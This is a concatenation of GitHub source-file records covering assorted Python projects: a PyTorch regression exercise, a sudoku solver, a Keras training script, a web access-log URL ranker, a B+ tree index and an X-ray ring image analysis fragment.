self.design_id = design_id\n\n def load(self, log):\n mdl = self.project.load_model(self.model_id)\n if self.conditions_id is not None:\n try:\n self.project.load_conditions( self.conditions_id, model=mdl)\n except IOError as e:\n log.add_error(\"conditions {} not found\".format(self.conditions_id), str(e))\n return None\n\n if self.design_id is not None:\n try:\n self.project.load_design(self.design_id, model=mdl)\n except IOError as e:\n log.add_error(\"design {} not found\".format(self.design_id), str(e))\n return None\n\n return mdl\n","repo_name":"SBRCNottingham/gsmodutils","sub_path":"gsmodutils/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7102,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"} +{"seq_id":"21563379606","text":"from turtle import shape\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport torch\r\nimport random\r\n\r\n\r\ndef data(w:torch.Tensor,b,sample_number):\r\n x = torch.normal(0,1,(sample_number,w.shape[0]))\r\n y = torch.matmul(x,w) + b + torch.normal(0,0.01,(sample_number,))\r\n return x,y\r\n\r\ndef 
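# A Python 3 sketch of the stdout-capture behaviour of stdout_ctx above;
# contextlib.redirect_stdout plus io.StringIO gives the same effect without
# swapping sys.stdout by hand.
import contextlib
import io

buf = io.StringIO()
with contextlib.redirect_stdout(buf):
    print("captured, not shown")
print("captured text:", repr(buf.getvalue()))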
get_sample(features,labels,batch_size):\r\n indices = list(range(0,len(labels)))\r\n random.shuffle(indices) # 打乱下标顺序,直接对源数据进行修改\r\n for i in range(0,len(labels),batch_size):\r\n index = indices[i:min(i+batch_size,len(labels))]\r\n yield features[index],labels[index]\r\n\r\nw = torch.tensor([2,-3.4])\r\nb = 4.2\r\nfeatures,labels = data(w,b,1000)\r\n\r\n\r\nbatch_size = 10\r\nw = torch.normal(0,0.01,(2,),requires_grad=True)\r\nb = torch.normal(0,0.01,(1,),requires_grad=True)\r\n\r\n\r\ndef linear_regression(x,w,b):\r\n return torch.matmul(x,w)+b\r\n\r\n\r\ndef square_loss_function(y_hat,y):\r\n return 0.5*(y_hat-y)**2\r\n\r\ndef sgd(params,lr,batch_size):\r\n with torch.no_grad():\r\n for param in params:\r\n # param = param - lr/batch_size*param.grad 会导致 param.grad消失\r\n # https://blog.csdn.net/yinizhilianlove/article/details/104033592\r\n param -= lr/batch_size*param.grad \r\n param.grad.zero_()\r\nlr = 0.03 # 学习率\r\nepochs = 10 # 学习轮数\r\nnet = linear_regression # 网络结构,这里就是一个线性回归模型\r\nloss = square_loss_function # 损失函数\r\nbatch_size\r\n\r\nfor epoch in range(epochs):\r\n for X,y in get_sample(features,labels,batch_size):\r\n y_hat = net(X,w,b)\r\n l = loss(y_hat,y)\r\n l.sum().backward() # 反向传播,然后才能计算w、b的梯度\r\n sgd([w,b],lr,batch_size)\r\n with torch.no_grad():\r\n l = loss(net(features,w,b),labels)\r\n print(f\"epoch:{epoch}, loss: {l.mean()}, w: {w[0],w[1]}, b: {b[0]}\")\r\n \r\n ","repo_name":"whr819987540/whu_linux","sub_path":"fl/3/线性回归/2-线性回归/线性回归.py","file_name":"线性回归.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11384632245","text":"# @param A : list of list of chars\ndef solveSudoku(A):\n\n for i in range(len(A)):\n A[i] = list(A[i])\n \n rows = [[False for j in range(9)] for i in range(9)]\n columns = [[False for j in range(9)] for i in range(9)]\n grids = [[False for j in range(9)] for i in range(9)]\n \n for i in range(9):\n for j in range(9):\n if A[i][j] == '.':\n continue\n else:\n num = int(A[i][j])\n rows[i][num-1] = True\n columns[j][num-1] = True\n grid = (i//3)*3 + (j//3)\n grids[grid][num-1] = True\n\n def is_safe(row, col, num, rows, columns, grids):\n grid = (row//3)*3 + (col//3)\n if (rows[row][num-1]) or (columns[col][num-1]) or (grids[grid][num-1]):\n return False\n rows[row][num-1] = True\n columns[col][num-1] = True\n grids[grid][num-1] = True\n return True\n \n def fill_sudoku(A, n, rows, columns, grids): \n for row in range(n):\n for col in range(n):\n if A[row][col] != '.':\n print('row: ', row)\n print('col: ', col)\n print('---------------------------------------')\n continue\n for i in range(1, 10):\n grid = (row//3)*3 + (col//3)\n if is_safe(row, col, i, rows, columns, grids):\n A[row][col] = i\n if fill_sudoku(A, n, rows, columns, grids):\n return True\n A[row][col] = '.'\n rows[row][i-1] = False\n columns[col][i-1] = False\n grids[grid][i-1] = False\n return False\n return True\n \n fill_sudoku(A, 9, rows, columns, grids)\n return A\n\nA = [[5,3,'.','.',7,'.','.','.','.'], [6,'.','.',1,9,5,'.','.','.'], ['.',9,8,'.','.','.','.',6,'.'], [8,'.','.','.',6,'.','.','.',3], [4,'.','.',8,'.',3,'.','.',1], [7,'.','.','.','2','.','.','.',6], ['.',6,'.','.','.','.',2,8,'.'], ['.','.','.',4,1,9,'.','.',5], ['.','.','.','.',8,'.','.',7,9]]\nA = 
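# A numpy-only sanity check for the hand-rolled SGD above: with features X and
# targets y generated as y = Xw + b + noise, the normal equations recover
# (w, b) in closed form, so they give a reference for the learned values.
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(0, 1, (1000, 2))
w_true, b_true = np.array([2.0, -3.4]), 4.2
y = X @ w_true + b_true + rng.normal(0, 0.01, 1000)

Xb = np.hstack([X, np.ones((1000, 1))])         # absorb the bias into the design matrix
theta, *_ = np.linalg.lstsq(Xb, y, rcond=None)  # least-squares fit
print(theta)                                    # ~ [ 2.  -3.4  4.2]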
solveSudoku(A)\nprint(A)","repo_name":"KiranACD/dsa-python","sub_path":"Backtracking/solve_sudoku.py","file_name":"solve_sudoku.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"9818102631","text":"import numpy as np\n\nnp.random.seed(1337)\n\nimport keras\nfrom model import Model, plot_accuracy, plot_loss\nimport argparse\nfrom argparse import Namespace\nimport os\nimport csv\nimport httplib2\nfrom datetime import datetime\nfrom apiclient import discovery\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\nfrom data import load_data\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/sheets.googleapis.com-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/spreadsheets'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Machine Learning Coursework 2'\n\n\ndef get_credentials(flags):\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'sheets.googleapis.com-python-quickstart.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n flags.noauth_local_webserver = True\n credentials = tools.run_flow(flow, store, flags)\n print('Storing credentials to ' + credential_path)\n\n return credentials\n\n\ndef report_local(params, loss, accuracy):\n if loss == \"nan\":\n return\n\n print(\"reporting:\\n\\tparams={}\\n\\tloss:{}\\n\\taccuracy\".format(params, loss, accuracy))\n\n with open(\"./results/results-{}.csv\".format(params.timestamp), \"a+\") as csvfile:\n writer = csv.writer(csvfile)\n values = [\n str(datetime.now()),\n str(params.loss),\n str(params.hidden_activation),\n str(params.output_activation),\n str(params.weight_initialisation),\n str(params.epochs),\n str(params.batch_size),\n str(params.lr),\n str(params.lr_scheduler),\n str(params.decay_rate),\n str(params.early_stopping_patience),\n str(params.dropout_first),\n str(params.dropout_second),\n str(params.momentum),\n str(params.l1),\n str(params.l2),\n str(loss),\n str(accuracy)\n ]\n\n writer.writerow(values)\n print(\", \".join(values))\n\n\ndef report_run(params, loss, accuracy):\n credentials = get_credentials(params)\n http = credentials.authorize(httplib2.Http())\n discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n 'version=v4')\n service = discovery.build('sheets', 'v4', http=http,\n discoveryServiceUrl=discoveryUrl)\n\n spreadsheet_id = '1tx0n4QN-tzjZNfqvqi74hs3RHHkRb5tZ2AxS4xMIxY0'\n range_name = 'Sheet1'\n\n service.spreadsheets().values().append(\n spreadsheetId=spreadsheet_id,\n range=range_name,\n valueInputOption=\"USER_ENTERED\",\n body={\n 'values': [[\n str(datetime.now()),\n ', '.join(map(str, params.hidden_layer_neurons)),\n params.loss,\n params.hidden_activation,\n params.output_activation,\n params.weight_initialisation,\n params.epochs,\n params.batch_size,\n params.lr,\n params.lr_decay,\n params.momentum,\n loss,\n accuracy\n ]]\n }).execute()\n\n\ndef train_and_report(training_data, validation_data, params):\n model = Model(training_data, validation_data, params)\n model.build()\n history = 
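# A compact checker for the solver above: a filled board is valid iff every
# row, column and 3x3 box contains 1..9 exactly once. It reuses the same box
# index formula, box = (r // 3) * 3 + c // 3.
def is_valid_solution(board):
    target = set(range(1, 10))
    rows = [set() for _ in range(9)]
    cols = [set() for _ in range(9)]
    boxes = [set() for _ in range(9)]
    for r in range(9):
        for c in range(9):
            v = int(board[r][c])
            rows[r].add(v)
            cols[c].add(v)
            boxes[(r // 3) * 3 + c // 3].add(v)
    return all(s == target for s in rows + cols + boxes)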
model.train(epochs=params.epochs, batch_size=params.batch_size)\n\n loss, accuracy = model.evaluate()\n report_local(params, loss, accuracy)\n\n return history, model\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(\n description='Run model with given arguments.',\n parents=[tools.argparser])\n\n parser.add_argument('--data', type=str, default='data4students.mat')\n parser.add_argument('--lr', type=float, default=0.207)\n parser.add_argument('--lr_scheduler', type=str, default='exponential_decay')\n parser.add_argument('--decay_rate', type=float, default=0.37293)\n parser.add_argument('--momentum', type=float, default=0.5)\n parser.add_argument('--epochs', type=int, default=1000)\n parser.add_argument('--batch_size', type=int, default=128)\n parser.add_argument('--hidden_activation', type=str, default='relu')\n parser.add_argument('--output_activation', type=str, default='softmax')\n parser.add_argument('--weight_initialisation', type=str, default='random_uniform')\n parser.add_argument('--loss', type=str, default='categorical_crossentropy')\n parser.add_argument('--timestamp', type=str, default='test')\n parser.add_argument('--early_stopping_patience', type=int, default=3)\n parser.add_argument('--dropout_first', type=float, default=0.08077)\n parser.add_argument('--dropout_second', type=float, default=0.24986)\n parser.add_argument('--l1', type=float, default=0.0)\n parser.add_argument('--l2', type=float, default=0.0)\n\n return parser\n\n\ndef confusion_matrix(testing_data, predictions):\n matrix = np.zeros((7, 7), dtype=int)\n\n # Compute confusion matrix\n for i, predicted_label in enumerate(predictions):\n expected_label = testing_data.targets[i].argmax(-1)\n matrix[expected_label, predicted_label] += 1\n\n # Rows are actual labels, columns are predicted labels\n predicted_sums = np.sum(matrix, axis=0)\n actual_sums = np.sum(matrix, axis=1)\n\n print(\"Confusion matrix:\")\n print(matrix)\n\n for i in range(7):\n true_positives = matrix[i, i]\n false_positives = predicted_sums[i] - true_positives\n false_negatives = actual_sums[i] - true_positives\n\n recall = true_positives / (true_positives + false_negatives)\n precision = true_positives / (true_positives + false_positives)\n f1 = 2 * (precision * recall) / (precision + recall)\n\n print(\"Statistics for emotion \" + str(i) + \":\")\n print(\"Recall: \" + str(recall))\n print(\"Precision: \" + str(precision))\n print(\"F1: \" + str(f1))\n print()\n\n\ndef main():\n parser = get_parser()\n params = parser.parse_args()\n\n training_data, testing_data, validation_data = load_data(params.data)\n\n history, model = train_and_report(training_data, validation_data, params)\n plot_accuracy(history)\n plot_loss(history)\n\n print(testing_data.data[0])\n predictions = model.model.predict(testing_data.data).argmax(-1)\n\n confusion_matrix(testing_data, predictions)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Thopiax/mlads-neural-networks","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35769213244","text":"'''\n Escreva um programa que leia um número inteiro\nqualquer e peça para o usuário escolher qual será\na base de conversão:\n\n1 - para binário\n2 - para octal\n3 - para hexadecimal\n'''\nnum = int(input('Digite um número: '))\nprint('''\nEscolha a base de conversão:\n1 - binário\n2 - octal\n3 - hexadecimal\n''')\nopcao = int(input('Sua opção: '))\n\nif opcao == 1:\n 
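# A self-contained version of the per-class metrics computed in
# confusion_matrix() above: rows are true labels, columns are predictions, and
# precision/recall/F1 follow from the column/row sums. The 3x3 matrix is toy data.
import numpy as np

m = np.array([[5, 1, 0],
              [2, 6, 1],
              [0, 1, 4]])
tp = np.diag(m)
precision = tp / m.sum(axis=0)   # column sums = predicted counts
recall = tp / m.sum(axis=1)      # row sums = actual counts
f1 = 2 * precision * recall / (precision + recall)
print(precision, recall, f1)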
print(f'{num} em binário é {bin(num)[2:]}')\nelif opcao == 2:\n print(f'{num} em octal é {oct(num)[2:]}')\nelif opcao == 3:\n print(f'{num} em decimal é {hex(num)[2:]}')\nelse:\n print('Opção inválida.')","repo_name":"thomillaz/exercicios-py","sub_path":"curso em video II/aula12-desafio37.py","file_name":"aula12-desafio37.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32547765950","text":"import datetime\nfrom clfparser import CLFParser\nimport operator\n\n# def tail(file, n=1, bs=1024):\n# f = open(file)\n# f.seek(0,2)\n# l = 1-f.read(1).count('\\n')\n# B = f.tell()\n# while n >= l and B > 0:\n# block = min(bs, B)\n# B -= block\n# f.seek(B, 0)\n# l += f.read(block).count('\\n')\n# f.seek(B, 0)\n# l = min(l,n)\n# lines = f.readlines()[-l:]\n# f.close()\n# return lines\n\nURLS_TO_EXCLUDE = [\"/sitenews/rss/\",\n \"/favicon.ico/\"]\n\ndef webpage_url_filter(url):\n return True if url[-1] == \"/\" and url not in URLS_TO_EXCLUDE else False\n\ndef retrieve_log(filename):\n with open(filename, \"r\") as f:\n content = f.readlines()\n return [CLFParser.logDict(l) for l in content]\n\ndef filter_log_to_get_ip_urls(records, cutoff_time):\n return [r['r'].split(\" \")[1] for r in records\n if r['h'] != '-' and\n r['r'][0:4] == '\"GET'and\n isinstance(r['time'], datetime.date) and\n r['time'] > cutoff_time]\n\ndef pages_by_popularity(filename, cutoff_time, url_filter):\n records = retrieve_log(filename)\n kept = filter(url_filter,\n filter_log_to_get_ip_urls(records, cutoff_time))\n urls = {}\n for item in kept:\n if item in urls:\n urls[item] = urls[item] + 1\n else:\n urls[item] = 1\n most_pop = sorted(urls.items(), key=operator.itemgetter(1), reverse=True)\n return most_pop\n\ndef most_popular_pages(filename, cutoff_time, num=5, url_filter=None):\n return pages_by_popularity(filename, cutoff_time, url_filter)[0:num]\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='Get most popular pages')\n parser.add_argument('--logfile', type=str, default=\"access.log\")\n parser.add_argument('--date', type=str, default=\"\")\n parser.add_argument('--diff', type=int, default=10)\n parser.add_argument('--num', type=int, default=5)\n parser.add_argument('--stdfilter', type=bool, default=True)\n parser.add_argument('--filter', dest='stdfilter', action='store_true')\n parser.add_argument('--no-filter', dest='stdfilter', action='store_false')\n parser.set_defaults(stdfilter=True)\n options = parser.parse_args()\n\n if options.date == \"\":\n cutoff_time = datetime.datetime.now() - \\\n datetime.timedelta(minutes=options.diff)\n else:\n cutoff_time = datetime.datetime.strptime(options.date,\n '%Y-%m-%d %H:%M:%S')\n if options.stdfilter:\n url_filter = webpage_url_filter\n else:\n url_filter = None\n pages = most_popular_pages(options.logfile, cutoff_time,\n options.num, url_filter)\n for k,v in pages:\n print(k, v)\n","repo_name":"groundupnews/gu","sub_path":"analyzer/top_urls.py","file_name":"top_urls.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"34"} +{"seq_id":"21572479999","text":"from typing import Sequence\n\nimport dynmen\nfrom dynmen import Menu, MenuResult, MenuError\n\n\ndef dmenu(items: Sequence[str], active_indices: Sequence[int] = None, prompt: str = \"dmenu\") -> int:\n args: list[str] = [\"dmenu\", \"-format\", \"i\", \"-i\", \"-p\", prompt]\n if 
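# The manual dict counting in pages_by_popularity above is exactly what
# collections.Counter does; most_common(n) also replaces the explicit
# sorted(..., key=operator.itemgetter(1), reverse=True) step.
from collections import Counter

urls = ["/a/", "/b/", "/a/", "/c/", "/a/", "/b/"]
print(Counter(urls).most_common(2))   # [('/a/', 3), ('/b/', 2)]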
active_indices:\n args += [\"-a\", \",\".join([str(i) for i in active_indices])]\n menu: Menu = dynmen.Menu(args)\n\n try:\n result: MenuResult = menu(items)\n if result.selected is None:\n return -1\n else:\n return int(result.selected)\n except MenuError:\n return -1\n","repo_name":"cwrau/linux-config","sub_path":"config/rootfs/usr/local/bin/lib/dmenu.py","file_name":"dmenu.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"10867520055","text":"import typing\nfrom collections import defaultdict\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass DeleteResult:\n new_first: typing.Optional[int]\n condition_of_tree_valid: bool = True\n leaf: bool = False\n\n\nclass BTreeNode:\n def __init__(self, max_keys: int):\n self.children: typing.List[BTreeNode] = []\n self.keys: typing.List[int] = []\n self.values: typing.Optional[typing.List[str]] = None # None in non-leaf nodes\n self.max_keys = max_keys\n\n def insert(self, key: int, value: str) -> typing.Optional['BTreeNode']:\n for i in range(len(self.keys)):\n if self.keys[i] >= key:\n maybe_new_node = self.children[i].insert(key, value)\n insert_index = i\n break\n else:\n maybe_new_node = self.children[-1].insert(key, value)\n insert_index = len(self.children)\n\n if maybe_new_node:\n first_key = maybe_new_node.keys[0]\n self.keys.insert(insert_index, first_key)\n if insert_index < len(self.children):\n self.children = (self.children[:insert_index] + maybe_new_node.children +\n self.children[insert_index + 1:])\n else:\n self.children.pop()\n self.children.extend(maybe_new_node.children)\n\n if len(self.keys) > self.max_keys:\n mid = len(self.keys) // 2\n child_mid = (len(self.children) + 1) // 2\n left_keys, right_keys = self.keys[:mid], self.keys[mid + 1:]\n left_children, right_children = self.children[:child_mid], self.children[child_mid:]\n left_child = BTreeNode(self.max_keys)\n left_child.keys = left_keys\n left_child.children = left_children\n right_child = BTreeNode(self.max_keys)\n right_child.keys = right_keys\n right_child.children = right_children\n parent = BTreeNode(self.max_keys)\n parent.keys = [self.keys[mid]]\n parent.children = [left_child, right_child]\n return parent\n\n def delete(self, key: int) -> typing.Optional[DeleteResult]:\n # search for key to delete\n for i in range(len(self.keys)):\n if self.keys[i] > key:\n delete_res = self.children[i].delete(key)\n break\n else:\n i = len(self.keys)\n delete_res = self.children[i].delete(key)\n\n if not delete_res:\n return\n\n # we deleted from leaf, we are not a parent, we have to replace deleted element (if present) with the inorder successor\n self._replace_key_if_needed(key, delete_res.new_first)\n\n # child has not enough keys/children, so try to borrow from siblings\n if delete_res.leaf and not delete_res.condition_of_tree_valid:\n if i > 0 and self.children[i - 1]._has_enough_to_lend():\n # borrow right-most key from left child\n self.children[i].keys.insert(0, self.children[i - 1].keys.pop())\n self.children[i].values.insert(0, self.children[i - 1].values.pop())\n elif i + 1 < len(self.children) and self.children[i + 1]._has_enough_to_lend():\n # borrow left-most key from right child\n self.children[i].keys.append(self.children[i + 1].keys.pop(0))\n self.children[i].values.append(self.children[i + 1].values.pop(0))\n else:\n # we still have invalid child and have to merge\n if i > 0:\n # merge with left child\n new_keys = self.children[i - 1].keys + 
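# The wrapper above goes through the dynmen package; a hedged stdlib-only
# sketch of the same idea with subprocess (dmenu reads newline-separated items
# on stdin and prints the chosen line; -i makes matching case-insensitive).
# Returns -1 when the menu is cancelled, mirroring the function above.
import subprocess

def dmenu_index(items, prompt="dmenu"):
    proc = subprocess.run(
        ["dmenu", "-i", "-p", prompt],
        input="\n".join(items), capture_output=True, text=True,
    )
    choice = proc.stdout.strip()
    return items.index(choice) if choice in items else -1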
self.children[i].keys\n new_values = self.children[i - 1].values + self.children[i].values\n self.children[i].keys = new_keys\n self.children[i].values = new_values\n self.children[i - 1].keys = []\n self.children[i - 1].values = []\n elif i + 1 < len(self.children):\n # merge with right child\n new_keys = self.children[i].keys + self.children[i + 1].keys\n new_values = self.children[i].values + self.children[i + 1].values\n self.children[i].keys = new_keys\n self.children[i].values = new_values\n self.children[i + 1].keys = []\n self.children[i + 1].values = []\n delete_res.new_first = self._rearrange_keys_and_get_new_first()\n # try to borrow from sibling being grandfather\n if not delete_res.leaf and not delete_res.condition_of_tree_valid:\n if i > 0 and self.children[i - 1]._has_enough_to_lend():\n # borrow right-most key from left child\n self.children[i].children.insert(0, self.children[i - 1].children.pop())\n # it may happen that we need to only override the key or that we need to add a new one\n if self.children[i]._has_enough_keys():\n self.children[i].keys[0] = self.keys[i - 1]\n else:\n self.children[i].keys.insert(0, self.keys[i - 1])\n self.keys[i - 1] = self.children[i - 1].keys.pop()\n elif i + 1 < len(self.children) and self.children[i + 1]._has_enough_to_lend():\n # borrow left-most key from right child\n self.children[i].children.append(self.children[i + 1].children.pop(0))\n # it may happen that we need to only override the key or that we need to add a new one\n if self.children[i]._has_enough_keys():\n self.children[i].keys[-1] = self.keys[i]\n else:\n self.children[i].keys.append(self.keys[i])\n self.keys[i] = self.children[i + 1].keys.pop(0)\n else:\n # we still have the invalid child and have to merge\n if i > 0:\n # merge with left child\n new_children = self.children[i - 1].children + self.children[i].children\n new_keys = self.children[i - 1].keys + [self.keys.pop(i - 1)] + self.children[i].keys\n self.children[i - 1].children = new_children\n self.children[i - 1].keys = new_keys\n self.children.pop(i)\n elif i + 1 < len(self.children):\n # merge with right child\n new_children = self.children[i].children + self.children[i + 1].children\n new_keys = self.children[i].keys + [self.keys.pop(i)] + self.children[i + 1].keys\n self.children[i + 1].children = new_children\n self.children[i + 1].keys = new_keys\n self.children.pop(i)\n else:\n print(\"Impossibru...\")\n\n # we are a parent, we deleted from leaf and tried to restore the tree condition\n if delete_res.leaf:\n delete_res.condition_of_tree_valid = self.is_at_least_half_full() and all(c.is_at_least_half_full() for c in self.children)\n else:\n delete_res.condition_of_tree_valid = self.is_at_least_half_full()\n delete_res.leaf = False\n return delete_res\n\n def find(self, key: int) -> str:\n for i in range(len(self.keys)):\n if self.keys[i] > key:\n return self.children[i].find(key)\n else:\n i = len(self.keys)\n res = self.children[i].find(key)\n return res\n\n def _replace_key_if_needed(self, old: int, new: int):\n for i in range(len(self.keys)):\n if self.keys[i] == old:\n self.keys[i] = new\n break\n\n def _rearrange_keys_and_get_new_first(self) -> typing.Optional[int]:\n new_children = []\n for c in self.children:\n assert isinstance(c, BTreeNodeLeaf)\n if not c.keys:\n if c.prev:\n assert isinstance(c.prev, BTreeNodeLeaf)\n c.prev.next = c.next\n if c.next:\n assert isinstance(c.next, BTreeNodeLeaf)\n c.next.prev = c.prev\n continue\n new_children.append(c)\n self.keys = []\n self.children = 
new_children\n # rearrange our keys\n for i in range(1, len(self.children)):\n self.keys.append(self.children[i].keys[0])\n if self.children:\n return self.children[0].keys[0]\n return None\n\n def _has_enough_to_lend(self):\n return len(self.keys) > self.max_keys // 2\n\n def _has_enough_keys(self):\n return len(self.keys) >= self.max_keys // 2\n\n def is_at_least_half_full(self):\n return len(self.keys) >= self.max_keys // 2 and len(self.children) > self.max_keys // 2\n\n def __repr__(self):\n return str(self.keys)\n\n\nclass BTreeNodeLeaf(BTreeNode):\n def __init__(self, max_keys: int):\n super().__init__(max_keys)\n self.next: typing.Optional[BTreeNode] = None\n self.prev: typing.Optional[BTreeNode] = None\n self.values = []\n\n def insert(self, key: int, value: str) -> typing.Optional[BTreeNode]:\n for i in range(len(self.keys)):\n if self.keys[i] > key:\n self.keys.insert(i, key)\n self.values.insert(i, value)\n break\n else:\n self.keys.append(key)\n self.values.append(value)\n\n if len(self.keys) > self.max_keys:\n mid = len(self.keys) // 2\n left_keys, right_keys = self.keys[:mid], self.keys[mid:]\n left_values, right_values = self.values[:mid], self.values[mid:]\n left_child = BTreeNodeLeaf(self.max_keys)\n left_child.keys = left_keys\n left_child.values = left_values\n right_child = BTreeNodeLeaf(self.max_keys)\n right_child.keys = right_keys\n right_child.values = right_values\n\n left_child.next = right_child\n left_child.prev = self.prev\n right_child.prev = left_child\n right_child.next = self.next\n if self.prev:\n self.prev.next = left_child\n if self.next:\n self.next.prev = right_child\n\n parent = BTreeNode(self.max_keys)\n parent.keys = [self.keys[mid]]\n parent.children = [left_child, right_child]\n return parent\n\n def delete(self, key: int) -> typing.Optional[DeleteResult]:\n for i in range(len(self.keys)):\n if self.keys[i] == key:\n self.keys.pop(i)\n self.values.pop(i)\n break\n else:\n raise NoSuchKeyException(f'No key {key} found in a tree')\n\n if self.is_at_least_half_full():\n # case when after deletion b+tree condition is maintained in leaf, nothing to do more\n return DeleteResult(self.keys[0], leaf=True)\n # case when there is not enough elements in leaf after deletion\n if not self.keys:\n return DeleteResult(None, condition_of_tree_valid=False, leaf=True)\n return DeleteResult(self.keys[0], condition_of_tree_valid=False, leaf=True)\n\n def is_at_least_half_full(self):\n return len(self.keys) >= self.max_keys // 2\n\n def find(self, key: int) -> str:\n for i in range(len(self.keys)):\n if self.keys[i] == key:\n return self.values[i]\n raise NoSuchKeyException(f'No key {key} found in a tree')\n\n\n def __repr__(self):\n return str(self.keys)\n\n\nclass BTree:\n def __init__(self, max_keys: int):\n self.root = BTreeNodeLeaf(max_keys)\n self.height = 1\n\n def insert(self, key: int, value: str):\n maybe_new_root = self.root.insert(key, value)\n if maybe_new_root:\n self.root = maybe_new_root\n self.height += 1\n\n def delete(self, key: int):\n self.root.delete(key)\n if len(self.root.keys) in [0, 1] and len(self.root.children) == 1:\n self.root = self.root.children[0]\n elif not self.root.keys and not self.root.children:\n self.root = None\n\n def find(self, key: int) -> str:\n return self.root.find(key)\n\n def print(self):\n container: typing.Dict[int, typing.List[BTreeNode]] = defaultdict(list)\n self._dfs(self.root, 1, container)\n for level in sorted(container.keys()):\n for node in container[level]:\n node_keys = \"|\".join(map(str, node.keys))\n 
print(f'[{node_keys}]', end=' ')\n print()\n\n def print_leafs(self):\n if not self.root:\n return\n curr_node = self.root\n while curr_node.children:\n curr_node = curr_node.children[0]\n assert isinstance(curr_node, BTreeNodeLeaf)\n while curr_node:\n node_keys = \"|\".join(map(str, curr_node.keys))\n print(f'[{node_keys}]', end='->')\n curr_node = curr_node.next\n\n def get_leafs(self):\n sorted_keys = []\n if not self.root:\n return []\n curr_node = self.root\n while curr_node.children:\n curr_node = curr_node.children[0]\n assert isinstance(curr_node, BTreeNodeLeaf)\n while curr_node:\n sorted_keys.extend(curr_node.keys)\n curr_node = curr_node.next\n return sorted_keys\n\n def _dfs(self, root: BTreeNode, level: int, container: typing.Dict[int, typing.List[BTreeNode]]):\n if not root:\n return\n container[level].append(root)\n for c in root.children:\n self._dfs(c, level + 1, container)\n\n\nclass NoSuchKeyException(Exception):\n def __init__(self, msg: str):\n super().__init__(msg)\n","repo_name":"faderskd/performance-playground","sub_path":"apps/broker/b_tree_index.py","file_name":"b_tree_index.py","file_ext":"py","file_size_in_byte":13829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18912247497","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 22 13:35:59 2017\n\n@author: dbanco02\n\"\"\"\n\n## Init\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom numpy.linalg import norm \nimport matplotlib.pyplot as plt\nimport os\nimport time\n\nfrom scipy.signal import argrelmax\nfrom sklearn.linear_model import Lasso\n\nimport RingImageProcessing as RingIP\nimport EllipticModels as EM\nimport DataAnalysis as DA\nimport LassoSolvers\n\n\nreload(EM)\nreload(LassoSolvers)\n\n# Data directory\ndata_dir = os.path.join('D:','CHESS_raw_data')\nout_dir = os.path.join(data_dir,'out')\n\n# Load Real Image Data\nspecimen_name = 'al7075_mlf'\nstep_names = ['initial', '1turn', '2turn', '3turn', 'unload']\ndic_files = ['dic_4536', 'dic_4537', 'dic_4538', 'dic_4539', 'dic_4540']\ndark_dirs = [ 68, 277, 485, 692, 899]\ninit_dirs = [ 68, 277, 485, 692, 899]\ndic_center = [0.16, 2.9] # sample center (mm) in vic2d coordinates \nx_range, x_num = [-6, 6], 5 # x-ray measurements, range in mm\ny_range, y_num = [-5, 5], 41 # x-ray measurements, range in mm\ndetector_dist = 3289.95 # pixels\ntrue_center = [1020.67, 1024.61] # [row, column] of detector image center in pixels (shifted by 1 for python index)\ne_rng = [-0.012, 0.012] # elastic strain range\np_rng = [-0.024, 0.024] # plastic strain range\nt_rng = [-0.036, 0.036] # total strain range\nE, G, v = 71.7, 26.9, 0.33 # elastic modulus (GPa), shear modulus (GPa), poisson's ratio\n\nring_name = 'al_311'\nradius = 370 # ring radius in pixels\ndr = 30 # half of ring width in pixels\nmin_amp = 25 # minimum acceptable peak amplitude\nvec_frac = 0.25 # fraction of peaks that must be acceptable\n\nsample = DA.Specimen(specimen_name, data_dir, out_dir,\n step_names, dic_files, dark_dirs, \n init_dirs, dic_center, \n x_range,x_num, y_range, y_num,\n detector_dist, true_center, \n e_rng, p_rng, t_rng, E, G, v) \n\nnum_theta= 2048\ndtheta = 2*np.pi/num_theta\n\nnum_rad = 2*dr\ndrad = 1\n\nimg_num = 35\nload_step = 0\nimage = sample.load_image(img_num,load_step)\n\npolar_image = np.zeros((num_rad,num_theta))\n\nfor i, r in enumerate(np.arange(radius-dr,radius+dr,1)):\n fi, theta_domain = 
